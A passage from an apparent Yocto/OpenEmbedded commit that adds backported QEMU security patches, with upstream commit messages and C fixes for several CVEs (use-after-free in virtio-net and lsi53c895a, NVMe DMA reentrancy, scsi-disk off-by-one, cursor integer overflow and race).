+Date: Thu, 2 Sep 2021 13:44:12 +0800
+Subject: [PATCH] virtio-net: fix use after unmap/free for sg
+
+When mergeable buffer is enabled, we try to set the num_buffers after
+the virtqueue elem has been unmapped. This will lead several issues,
+E.g a use after free when the descriptor has an address which belongs
+to the non direct access region. In this case we use bounce buffer
+that is allocated during address_space_map() and freed during
+address_space_unmap().
+
+Fixing this by storing the elems temporarily in an array and delay the
+unmap after we set the the num_buffers.
+
+This addresses CVE-2021-3748.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: fbe78f4f55c6 ("virtio-net support")
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+https://github.com/qemu/qemu/commit/bedd7e93d01961fcb16a97ae45d93acf357e11f6
+CVE: CVE-2021-3748
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/net/virtio-net.c | 39 ++++++++++++++++++++++++++++++++-------
+ 1 file changed, 32 insertions(+), 7 deletions(-)
+
+diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
+index 16d20cdee52a..f205331dcf8c 100644
+--- a/hw/net/virtio-net.c
++++ b/hw/net/virtio-net.c
+@@ -1746,10 +1746,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ VirtIONet *n = qemu_get_nic_opaque(nc);
+ VirtIONetQueue *q = virtio_net_get_subqueue(nc);
+ VirtIODevice *vdev = VIRTIO_DEVICE(n);
++ VirtQueueElement *elems[VIRTQUEUE_MAX_SIZE];
++ size_t lens[VIRTQUEUE_MAX_SIZE];
+ struct iovec mhdr_sg[VIRTQUEUE_MAX_SIZE];
+ struct virtio_net_hdr_mrg_rxbuf mhdr;
+ unsigned mhdr_cnt = 0;
+- size_t offset, i, guest_offset;
++ size_t offset, i, guest_offset, j;
++ ssize_t err;
+
+ if (!virtio_net_can_receive(nc)) {
+ return -1;
+@@ -1780,6 +1783,12 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+
+ total = 0;
+
++ if (i == VIRTQUEUE_MAX_SIZE) {
++ virtio_error(vdev, "virtio-net unexpected long buffer chain");
++ err = size;
++ goto err;
++ }
++
+ elem = virtqueue_pop(q->rx_vq, sizeof(VirtQueueElement));
+ if (!elem) {
+ if (i) {
+@@ -1791,7 +1800,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ n->guest_hdr_len, n->host_hdr_len,
+ vdev->guest_features);
+ }
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ if (elem->in_num < 1) {
+@@ -1799,7 +1809,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ "virtio-net receive queue contains no in buffers");
+ virtqueue_detach_element(q->rx_vq, elem, 0);
+ g_free(elem);
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ sg = elem->in_sg;
+@@ -1836,12 +1847,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ if (!n->mergeable_rx_bufs && offset < size) {
+ virtqueue_unpop(q->rx_vq, elem, total);
+ g_free(elem);
+- return size;
++ err = size;
++ goto err;
+ }
+
+- /* signal other side */
+- virtqueue_fill(q->rx_vq, elem, total, i++);
+- g_free(elem);
++ elems[i] = elem;
++ lens[i] = total;
++ i++;
+ }
+
+ if (mhdr_cnt) {
+@@ -1851,10 +1863,23 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ &mhdr.num_buffers, sizeof mhdr.num_buffers);
+ }
+
++ for (j = 0; j < i; j++) {
++ /* signal other side */
++ virtqueue_fill(q->rx_vq, elems[j], lens[j], j);
++ g_free(elems[j]);
++ }
++
+ virtqueue_flush(q->rx_vq, i);
+ virtio_notify(vdev, q->rx_vq);
+
+ return size;
++
++err:
++ for (j = 0; j < i; j++) {
++ g_free(elems[j]);
++ }
++
++ return err;
+ }
+
+ static ssize_t virtio_net_do_receive(NetClientState *nc, const uint8_t *buf,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
new file mode 100644
index 0000000000..43630e71fb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
@@ -0,0 +1,180 @@
+From 1938fbc7ec197e2612ab2ce36dd69bff19208aa5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 10 Oct 2022 17:44:41 +0530
+Subject: [PATCH] CVE-2021-3750
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=b9d383ab797f54ae5fa8746117770709921dc529 && https://git.qemu.org/?p=qemu.git;a=commit;h=3ab6fdc91b72e156da22848f0003ff4225690ced && https://git.qemu.org/?p=qemu.git;a=commit;h=58e74682baf4e1ad26b064d8c02e5bc99c75c5d9]
+CVE: CVE-2021-3750
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 55 +++++++++++++++++++++++++++++++-------
+ hw/intc/arm_gicv3_redist.c | 4 +--
+ include/exec/memattrs.h | 9 +++++++
+ 3 files changed, 56 insertions(+), 12 deletions(-)
+
+diff --git a/exec.c b/exec.c
+index 1360051a..10581d8d 100644
+--- a/exec.c
++++ b/exec.c
+@@ -39,6 +39,7 @@
+ #include "qemu/config-file.h"
+ #include "qemu/error-report.h"
+ #include "qemu/qemu-print.h"
++#include "qemu/log.h"
+ #if defined(CONFIG_USER_ONLY)
+ #include "qemu.h"
+ #else /* !CONFIG_USER_ONLY */
+@@ -3118,6 +3119,33 @@ static bool prepare_mmio_access(MemoryRegion *mr)
+ return release_lock;
+ }
+
++/**
+++ * flatview_access_allowed
+++ * @mr: #MemoryRegion to be accessed
+++ * @attrs: memory transaction attributes
+++ * @addr: address within that memory region
+++ * @len: the number of bytes to access
+++ *
+++ * Check if a memory transaction is allowed.
+++ *
+++ * Returns: true if transaction is allowed, false if denied.
+++ */
++static bool flatview_access_allowed(MemoryRegion *mr, MemTxAttrs attrs,
++ hwaddr addr, hwaddr len)
++{
++ if (likely(!attrs.memory)) {
++ return true;
++ }
++ if (memory_region_is_ram(mr)) {
++ return true;
++ }
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Invalid access to non-RAM device at "
++ "addr 0x%" HWADDR_PRIX ", size %" HWADDR_PRIu ", "
++ "region '%s'\n", addr, len, memory_region_name(mr));
++ return false;
++}
++
+ /* Called within RCU critical section. */
+ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ MemTxAttrs attrs,
+@@ -3131,7 +3159,10 @@ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, true)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, true)) {
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+ /* XXX: could force current_cpu to NULL to avoid
+@@ -3173,14 +3204,14 @@ static MemTxResult flatview_write(FlatView *fv, hwaddr addr, MemTxAttrs attrs,
+ hwaddr l;
+ hwaddr addr1;
+ MemoryRegion *mr;
+- MemTxResult result = MEMTX_OK;
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, true, attrs);
+- result = flatview_write_continue(fv, addr, attrs, buf, len,
+- addr1, l, mr);
+-
+- return result;
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
++ return flatview_write_continue(fv, addr, attrs, buf, len,
++ addr1, l, mr);
+ }
+
+ /* Called within RCU critical section. */
+@@ -3195,7 +3226,10 @@ MemTxResult flatview_read_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, false)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, false)) {
+ /* I/O case */
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+@@ -3238,6 +3272,9 @@ static MemTxResult flatview_read(FlatView *fv, hwaddr addr,
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, false, attrs);
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
+ return flatview_read_continue(fv, addr, attrs, buf, len,
+ addr1, l, mr);
+ }
+@@ -3474,12 +3511,10 @@ bool address_space_access_valid(AddressSpace *as, hwaddr addr,
+ MemTxAttrs attrs)
+ {
+ FlatView *fv;
+- bool result;
+
+ RCU_READ_LOCK_GUARD();
+ fv = address_space_to_flatview(as);
+- result = flatview_access_valid(fv, addr, len, is_write, attrs);
+- return result;
++ return flatview_access_valid(fv, addr, len, is_write, attrs);
+ }
+
+ static hwaddr
+diff --git a/hw/intc/arm_gicv3_redist.c b/hw/intc/arm_gicv3_redist.c
+index 8645220d..44368e28 100644
+--- a/hw/intc/arm_gicv3_redist.c
++++ b/hw/intc/arm_gicv3_redist.c
+@@ -450,7 +450,7 @@ MemTxResult gicv3_redist_read(void *opaque, hwaddr offset, uint64_t *data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest read at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+@@ -507,7 +507,7 @@ MemTxResult gicv3_redist_write(void *opaque, hwaddr offset, uint64_t data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest write at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+diff --git a/include/exec/memattrs.h b/include/exec/memattrs.h
+index 95f2d20d..9fb98bc1 100644
+--- a/include/exec/memattrs.h
++++ b/include/exec/memattrs.h
+@@ -35,6 +35,14 @@ typedef struct MemTxAttrs {
+ unsigned int secure:1;
+ /* Memory access is usermode (unprivileged) */
+ unsigned int user:1;
++ /*
++ * Bus interconnect and peripherals can access anything (memories,
++ * devices) by default. By setting the 'memory' bit, bus transaction
++ * are restricted to "normal" memories (per the AMBA documentation)
++ * versus devices. Access to devices will be logged and rejected
++ * (see MEMTX_ACCESS_ERROR).
++ */
++ unsigned int memory:1;
+ /* Requester ID (for MSI for example) */
+ unsigned int requester_id:16;
+ /* Invert endianness for this page */
+@@ -66,6 +74,7 @@ typedef struct MemTxAttrs {
+ #define MEMTX_OK 0
+ #define MEMTX_ERROR (1U << 0) /* device returned an error */
+ #define MEMTX_DECODE_ERROR (1U << 1) /* nothing at that address */
++#define MEMTX_ACCESS_ERROR (1U << 2) /* access denied */
+ typedef uint32_t MemTxResult;
+
+ #endif
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
new file mode 100644
index 0000000000..a1862f1226
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
@@ -0,0 +1,81 @@
+From 2c682b5975b41495f98cc34b8243042c446eec44 Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:36:16 -0700
+Subject: [PATCH] hw/nvme: fix CVE-2021-3929 MIME-Version: 1.0 Content-Type:
+ text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes CVE-2021-3929 "locally" by denying DMA to the iomem of the
+device itself. This still allows DMA to MMIO regions of other devices
+(e.g. doing P2P DMA to the controller memory buffer of another NVMe
+device).
+
+Fixes: CVE-2021-3929
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+
+Upstream-Status: Backport
+[https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385]
+CVE: CVE-2021-3929
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 23 +++++++++++++++++++++++
+ hw/block/nvme.h | 1 +
+ 2 files changed, 24 insertions(+)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index bda446d..ae9b19f 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,8 +60,31 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
++static inline bool nvme_addr_is_iomem(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr hi, lo;
++
++ /*
++ * The purpose of this check is to guard against invalid "local" access to
++ * the iomem (i.e. controller registers). Thus, we check against the range
++ * covered by the 'bar0' MemoryRegion since that is currently composed of
++ * two subregions (the NVMe "MBAR" and the MSI-X table/pba). Note, however,
++ * that if the device model is ever changed to allow the CMB to be located
++ * in BAR0 as well, then this must be changed.
++ */
++ lo = n->bar0.addr;
++ hi = lo + int128_get64(n->bar0.size);
++
++ return addr >= lo && addr < hi;
++}
++
+ static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
++
++ if (nvme_addr_is_iomem(n, addr)) {
++ return NVME_DATA_TRAS_ERROR;
++ }
++
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+ return 0;
+diff --git a/hw/block/nvme.h b/hw/block/nvme.h
+index 557194e..5a2b119 100644
+--- a/hw/block/nvme.h
++++ b/hw/block/nvme.h
+@@ -59,6 +59,7 @@ typedef struct NvmeNamespace {
+
+ typedef struct NvmeCtrl {
+ PCIDevice parent_obj;
++ MemoryRegion bar0;
+ MemoryRegion iomem;
+ MemoryRegion ctrl_mem;
+ NvmeBar bar;
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
new file mode 100644
index 0000000000..b1b5558647
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
@@ -0,0 +1,53 @@
+From b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 4 Nov 2021 17:31:38 +0100
+Subject: [PATCH] hw/scsi/scsi-disk: MODE_PAGE_ALLS not allowed in MODE SELECT
+ commands
+
+This avoids an off-by-one read of 'mode_sense_valid' buffer in
+hw/scsi/scsi-disk.c:mode_sense_page().
+
+Fixes: CVE-2021-3930
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: a8f4bbe2900 ("scsi-disk: store valid mode pages in a table")
+Fixes: #546
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8
+CVE: CVE-2021-3930
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/scsi-disk.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
+index e8a547dbb7..d4914178ea 100644
+--- a/hw/scsi/scsi-disk.c
++++ b/hw/scsi/scsi-disk.c
+@@ -1087,6 +1087,7 @@ static int mode_sense_page(SCSIDiskState *s, int page, uint8_t **p_outbuf,
+ uint8_t *p = *p_outbuf + 2;
+ int length;
+
++ assert(page < ARRAY_SIZE(mode_sense_valid));
+ if ((mode_sense_valid[page] & (1 << s->qdev.type)) == 0) {
+ return -1;
+ }
+@@ -1428,6 +1429,11 @@ static int scsi_disk_check_mode_select(SCSIDiskState *s, int page,
+ return -1;
+ }
+
++ /* MODE_PAGE_ALLS is only valid for MODE SENSE commands */
++ if (page == MODE_PAGE_ALLS) {
++ return -1;
++ }
++
+ p = mode_current;
+ memset(mode_current, 0, inlen + 2);
+ len = mode_sense_page(s, page, &p, 0);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
new file mode 100644
index 0000000000..80ad49e4ed
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
@@ -0,0 +1,89 @@
+From fa892e9abb728e76afcf27323ab29c57fb0fe7aa Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:17:12 +0200
+Subject: [PATCH] ui/cursor: fix integer overflow in cursor_alloc
+ (CVE-2021-4206)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Prevent potential integer overflow by limiting 'width' and 'height' to
+512x512. Also change 'datasize' type to size_t. Refer to security
+advisory https://starlabs.sg/advisories/22-4206/ for more information.
+
+Fixes: CVE-2021-4206
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081712.345609-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/fa892e9a
+CVE: CVE-2021-4206
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 7 +++++++
+ hw/display/vmware_vga.c | 2 ++
+ ui/cursor.c | 8 +++++++-
+ 3 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index 237ed293ba..ca217004bf 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -247,6 +247,13 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ size_t size;
+
+ c = cursor_alloc(cursor->header.width, cursor->header.height);
++
++ if (!c) {
++ qxl_set_guest_bug(qxl, "%s: cursor %ux%u alloc error", __func__,
++ cursor->header.width, cursor->header.height);
++ goto fail;
++ }
++
+ c->hot_x = cursor->header.hot_spot_x;
+ c->hot_y = cursor->header.hot_spot_y;
+ switch (cursor->header.type) {
+diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
+index 98c83474ad..45d06cbe25 100644
+--- a/hw/display/vmware_vga.c
++++ b/hw/display/vmware_vga.c
+@@ -515,6 +515,8 @@ static inline void vmsvga_cursor_define(struct vmsvga_state_s *s,
+ int i, pixels;
+
+ qc = cursor_alloc(c->width, c->height);
++ assert(qc != NULL);
++
+ qc->hot_x = c->hot_x;
+ qc->hot_y = c->hot_y;
+ switch (c->bpp) {
+diff --git a/ui/cursor.c b/ui/cursor.c
+index 1d62ddd4d0..835f0802f9 100644
+--- a/ui/cursor.c
++++ b/ui/cursor.c
+@@ -46,6 +46,8 @@ static QEMUCursor *cursor_parse_xpm(const char *xpm[])
+
+ /* parse pixel data */
+ c = cursor_alloc(width, height);
++ assert(c != NULL);
++
+ for (pixel = 0, y = 0; y < height; y++, line++) {
+ for (x = 0; x < height; x++, pixel++) {
+ idx = xpm[line][x];
+@@ -91,7 +93,11 @@ QEMUCursor *cursor_builtin_left_ptr(void)
+ QEMUCursor *cursor_alloc(int width, int height)
+ {
+ QEMUCursor *c;
+- int datasize = width * height * sizeof(uint32_t);
++ size_t datasize = width * height * sizeof(uint32_t);
++
++ if (width > 512 || height > 512) {
++ return NULL;
++ }
+
+ c = g_malloc0(sizeof(QEMUCursor) + datasize);
+ c->width = width;
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
new file mode 100644
index 0000000000..8418246247
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
@@ -0,0 +1,43 @@
+From 9569f5cb5b4bffa9d3ebc8ba7da1e03830a9a895 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:11:06 +0200
+Subject: [PATCH] display/qxl-render: fix race condition in qxl_cursor
+ (CVE-2021-4207)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Avoid fetching 'width' and 'height' a second time to prevent possible
+race condition. Refer to security advisory
+https://starlabs.sg/advisories/22-4207/ for more information.
+
+Fixes: CVE-2021-4207
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081106.343235-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/9569f5cb
+CVE: CVE-2021-4207
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d28849b121..237ed293ba 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -266,7 +266,7 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ }
+ break;
+ case SPICE_CURSOR_TYPE_ALPHA:
+- size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
++ size = sizeof(uint32_t) * c->width * c->height;
+ qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
+ if (qxl->debug > 2) {
+ cursor_print_ascii_art(c, "qxl/alpha");
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
new file mode 100644
index 0000000000..6a7ce0e26c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
@@ -0,0 +1,42 @@
+From 6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Tue, 5 Jul 2022 22:05:43 +0200
+Subject: [PATCH] scsi/lsi53c895a: fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req->req to NULL to prevent reusing a free'd buffer in case of
+repeated SCSI cancel requests. Thanks to Thomas Huth for suggesting the patch.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Thomas Huth <thuth@redhat.com>
+Message-Id: <20220705200543.2366809-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index c8773f73f7..99ea42d49b 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1028,8 +1028,9 @@ static void lsi_do_msgout(LSIState *s)
+ case 0x0d:
+ /* The ABORT TAG message clears the current I/O process only. */
+ trace_lsi_do_msgout_abort(current_tag);
+- if (current_req) {
++ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
++ current_req->req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
new file mode 100644
index 0000000000..137906cd30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
@@ -0,0 +1,52 @@
+From 4367a20cc442c56b05611b4224de9a61908f9eac Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Mon, 11 Jul 2022 14:33:16 +0200
+Subject: [PATCH] scsi/lsi53c895a: really fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req to NULL, not current_req->req, to prevent reusing a free'd
+buffer in case of repeated SCSI cancel requests. Also apply the fix to
+CLEAR QUEUE and BUS DEVICE RESET messages as well, since they also cancel
+the request.
+
+Thanks to Alexander Bulekov for providing a reproducer.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20220711123316.421279-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/4367a20cc4
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 +-
+ 1 files changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index 99ea42d49b..ad5f5e5f39 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1030,7 +1030,7 @@ static void lsi_do_msgout(LSIState *s)
+ trace_lsi_do_msgout_abort(current_tag);
+ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
+- current_req->req = NULL;
++ current_req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+@@ -1056,6 +1056,7 @@ static void lsi_do_msgout(LSIState *s)
+ /* clear the current I/O process */
+ if (s->current) {
+ scsi_req_cancel(s->current->req);
++ current_req = NULL;
+ }
+
+ /* As the current implemented devices scsi_disk and scsi_generic
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
new file mode 100644
index 0000000000..fc4d6cf3df
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From 8d1b247f3748ac4078524130c6d7ae42b6140aaf Mon Sep 17 00:00:00 2001
+From: Stefano Garzarella <sgarzare@redhat.com>
+Date: Mon, 28 Feb 2022 10:50:58 +0100
+Subject: [PATCH] vhost-vsock: detach the virqueue element in case of error
+
+In vhost_vsock_common_send_transport_reset(), if an element popped from
+the virtqueue is invalid, we should call virtqueue_detach_element() to
+detach it from the virtqueue before freeing its memory.
+
+Fixes: fc0b9b0e1c ("vhost-vsock: add virtio sockets device")
+Fixes: CVE-2022-26354
+Cc: qemu-stable@nongnu.org
+Reported-by: VictorV <vv474172261@gmail.com>
+Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
+Message-Id: <20220228095058.27899-1-sgarzare@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+CVE: CVE-2022-26354
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2022-26354.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8d1b247f3748ac4078524130c6d7ae42b6140aaf ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/virtio/vhost-vsock-common.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+--- a/hw/virtio/vhost-vsock.c
++++ b/hw/virtio/vhost-vsock.c
+@@ -221,19 +221,23 @@ static void vhost_vsock_send_transport_r
+ if (elem->out_num) {
+ error_report("invalid vhost-vsock event virtqueue element with "
+ "out buffers");
+- goto out;
++ goto err;
+ }
+
+ if (iov_from_buf(elem->in_sg, elem->in_num, 0,
+ &event, sizeof(event)) != sizeof(event)) {
+ error_report("vhost-vsock event virtqueue element is too short");
+- goto out;
++ goto err;
+ }
+
+ virtqueue_push(vq, elem, sizeof(event));
+ virtio_notify(VIRTIO_DEVICE(vsock), vq);
+
+-out:
++ g_free(elem);
++ return;
++
++err:
++ virtqueue_detach_element(vq, elem, 0);
+ g_free(elem);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
new file mode 100644
index 0000000000..4196ebcf98
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
@@ -0,0 +1,53 @@
